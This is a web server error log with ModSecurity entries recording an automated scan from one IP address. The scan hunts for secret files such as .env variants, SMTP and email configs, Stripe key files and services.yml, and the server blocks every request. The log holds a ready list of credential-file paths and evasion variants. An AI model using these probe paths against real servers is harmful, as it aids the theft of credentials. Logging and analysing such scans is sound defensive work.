[Fri Jan 16 03:14:21.989816 2026] [:error] [pid 1444033] [client 45.148.10.246:48684] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.yml"] [unique_id "aWme_dLJkp65ULFQ2YYgoQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//.env.yml
[Fri Jan 16 03:14:21.990038 2026] [:error] [pid 1444033] [client 45.148.10.246:48684] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.yml"] [unique_id "aWme_dLJkp65ULFQ2YYgoQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//.env.yml
[Fri Jan 16 03:14:21.990202 2026] [:error] [pid 1444033] [client 45.148.10.246:48684] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.yml"] [unique_id "aWme_dLJkp65ULFQ2YYgoQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//.env.yml
[Fri Jan 16 03:14:22.126098 2026] [:error] [pid 1444034] [client 45.148.10.246:48698] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.yml"] [unique_id "aWme_uRfEYyDES-ZFL4glQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./.env.yml
[Fri Jan 16 03:14:22.126317 2026] [:error] [pid 1444034] [client 45.148.10.246:48698] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.yml"] [unique_id "aWme_uRfEYyDES-ZFL4glQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./.env.yml
[Fri Jan 16 03:14:22.126547 2026] [:error] [pid 1444034] [client 45.148.10.246:48698] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.yml"] [unique_id "aWme_uRfEYyDES-ZFL4glQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./.env.yml
[Fri Jan 16 03:14:22.351301 2026] [:error] [pid 1444035] [client 45.148.10.246:48700] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.yaml"] [unique_id "aWme_rauW6yeGWXfDeFWVwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/.env.yaml
[Fri Jan 16 03:14:22.351528 2026] [:error] [pid 1444035] [client 45.148.10.246:48700] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.yaml"] [unique_id "aWme_rauW6yeGWXfDeFWVwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/.env.yaml
[Fri Jan 16 03:14:22.351723 2026] [:error] [pid 1444035] [client 45.148.10.246:48700] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.yaml"] [unique_id "aWme_rauW6yeGWXfDeFWVwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/.env.yaml
[Fri Jan 16 03:14:22.555530 2026] [:error] [pid 1444032] [client 45.148.10.246:48708] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yaml/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.yaml/"] [unique_id "aWme_ukMvq8uPO2ZciWolQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.yaml/
[Fri Jan 16 03:14:22.555758 2026] [:error] [pid 1444032] [client 45.148.10.246:48708] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.yaml/"] [unique_id "aWme_ukMvq8uPO2ZciWolQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.yaml/
[Fri Jan 16 03:14:22.555941 2026] [:error] [pid 1444032] [client 45.148.10.246:48708] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.yaml/"] [unique_id "aWme_ukMvq8uPO2ZciWolQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.yaml/
[Fri Jan 16 03:14:22.713158 2026] [:error] [pid 1444226] [client 45.148.10.246:48722] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.yaml"] [unique_id "aWme_mcpoCUgeFICb0bc9QAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//.env.yaml
[Fri Jan 16 03:14:22.713401 2026] [:error] [pid 1444226] [client 45.148.10.246:48722] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.yaml"] [unique_id "aWme_mcpoCUgeFICb0bc9QAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//.env.yaml
[Fri Jan 16 03:14:22.713579 2026] [:error] [pid 1444226] [client 45.148.10.246:48722] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.yaml"] [unique_id "aWme_mcpoCUgeFICb0bc9QAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//.env.yaml
[Fri Jan 16 03:14:22.897082 2026] [:error] [pid 1444031] [client 45.148.10.246:48728] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.yaml"] [unique_id "aWme_n-9MmrgwjmYTAJQeQAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.env.yaml
[Fri Jan 16 03:14:22.897324 2026] [:error] [pid 1444031] [client 45.148.10.246:48728] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.yaml"] [unique_id "aWme_n-9MmrgwjmYTAJQeQAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.env.yaml
[Fri Jan 16 03:14:22.897488 2026] [:error] [pid 1444031] [client 45.148.10.246:48728] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.yaml"] [unique_id "aWme_n-9MmrgwjmYTAJQeQAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.env.yaml
[Fri Jan 16 03:14:56.176875 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:56498] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/Email.php
[Fri Jan 16 03:14:56.297725 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:56502] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/Email.php/
[Fri Jan 16 03:14:56.659408 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:56524] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/./app/Config/Email.php
[Fri Jan 16 03:14:56.796758 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:56532] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/email.php
[Fri Jan 16 03:14:56.947029 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:56536] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/email.php/
[Fri Jan 16 03:14:57.077473 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:56548] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com//app/Config/email.php
[Fri Jan 16 03:14:57.251274 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:56564] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/./app/Config/email.php
[Fri Jan 16 03:14:57.420051 2026] [authz_core:error] [pid 1444035] [client 45.148.10.246:56566] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/SMTP.php
[Fri Jan 16 03:14:57.584684 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:56572] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/SMTP.php/
[Fri Jan 16 03:14:57.727023 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:56580] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com//app/Config/SMTP.php
[Fri Jan 16 03:14:57.950518 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:56594] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/./app/Config/SMTP.php
[Fri Jan 16 03:14:58.086708 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:56600] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/Smtp.php
[Fri Jan 16 03:14:58.230033 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:56616] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/Smtp.php/
[Fri Jan 16 03:14:58.385970 2026] [authz_core:error] [pid 1444035] [client 45.148.10.246:56618] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com//app/Config/Smtp.php
[Fri Jan 16 03:14:58.511448 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:56624] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/./app/Config/Smtp.php
[Fri Jan 16 03:15:04.558243 2026] [authz_core:error] [pid 1444035] [client 45.148.10.246:48310] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/stripe.php
[Fri Jan 16 03:15:04.740911 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:48326] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/stripe.php/
[Fri Jan 16 03:15:04.873343 2026] [authz_core:error] [pid 1444033] [client 45.148.10.246:48330] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com//app/config/stripe.php
[Fri Jan 16 03:15:05.009415 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:48342] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/./app/config/stripe.php
[Fri Jan 16 03:15:05.187076 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:48344] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/stripe.local.php
[Fri Jan 16 03:15:05.349640 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:48350] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/stripe.local.php/
[Fri Jan 16 03:15:05.700757 2026] [authz_core:error] [pid 1444035] [client 45.148.10.246:48354] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/./app/config/stripe.local.php
[Fri Jan 16 03:15:06.047471 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:48370] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/stripe.production.php/
[Fri Jan 16 03:15:06.181468 2026] [authz_core:error] [pid 1444033] [client 45.148.10.246:48382] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com//app/config/stripe.production.php
[Fri Jan 16 03:15:06.318454 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:48392] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/./app/config/stripe.production.php
[Fri Jan 16 03:15:06.473396 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:48402] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/stripe_keys.php
[Fri Jan 16 03:15:06.603443 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:48416] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/stripe_keys.php/
[Fri Jan 16 03:15:06.720071 2026] [authz_core:error] [pid 1444035] [client 45.148.10.246:48420] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com//app/config/stripe_keys.php
[Fri Jan 16 03:15:06.878503 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:48436] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/./app/config/stripe_keys.php
[Fri Jan 16 03:15:07.027039 2026] [authz_core:error] [pid 1444033] [client 45.148.10.246:48448] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/stripe-keys.php
[Fri Jan 16 03:15:07.162112 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:48464] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/stripe-keys.php/
[Fri Jan 16 03:15:07.283871 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:48476] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com//app/config/stripe-keys.php
[Fri Jan 16 03:15:07.473205 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:48490] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/./app/config/stripe-keys.php
[Fri Jan 16 03:15:16.376384 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:53488] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/Stripe.php
[Fri Jan 16 03:15:16.848503 2026] [authz_core:error] [pid 1444033] [client 45.148.10.246:53508] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/./app/Config/Stripe.php
[Fri Jan 16 03:15:16.990940 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:53512] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/stripe.php
[Fri Jan 16 03:15:17.164959 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:53528] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/stripe.php/
[Fri Jan 16 03:15:17.296750 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:53536] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com//app/Config/stripe.php
[Fri Jan 16 03:15:17.426540 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:53550] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/./app/Config/stripe.php
[Fri Jan 16 03:15:34.998911 2026] [:error] [pid 1444033] [client 45.148.10.246:53930] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/config/services.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/services.yml found within REQUEST_FILENAME: /config/services.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/services.yml"] [unique_id "aWmfRtLJkp65ULFQ2YYhOQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/config/services.yml
[Fri Jan 16 03:15:34.999156 2026] [:error] [pid 1444033] [client 45.148.10.246:53930] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/services.yml"] [unique_id "aWmfRtLJkp65ULFQ2YYhOQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/config/services.yml
[Fri Jan 16 03:15:34.999315 2026] [:error] [pid 1444033] [client 45.148.10.246:53930] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/services.yml"] [unique_id "aWmfRtLJkp65ULFQ2YYhOQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/config/services.yml
[Fri Jan 16 03:15:35.140018 2026] [:error] [pid 1444040] [client 45.148.10.246:53944] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/config/services.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/services.yml found within REQUEST_FILENAME: /config/services.yml/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/services.yml/"] [unique_id "aWmfR_n_5sIyKhJ5GAzYUgAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/config/services.yml/
[Fri Jan 16 03:15:35.140259 2026] [:error] [pid 1444040] [client 45.148.10.246:53944] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/services.yml/"] [unique_id "aWmfR_n_5sIyKhJ5GAzYUgAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/config/services.yml/
[Fri Jan 16 03:15:35.140432 2026] [:error] [pid 1444040] [client 45.148.10.246:53944] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/services.yml/"] [unique_id "aWmfR_n_5sIyKhJ5GAzYUgAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/config/services.yml/
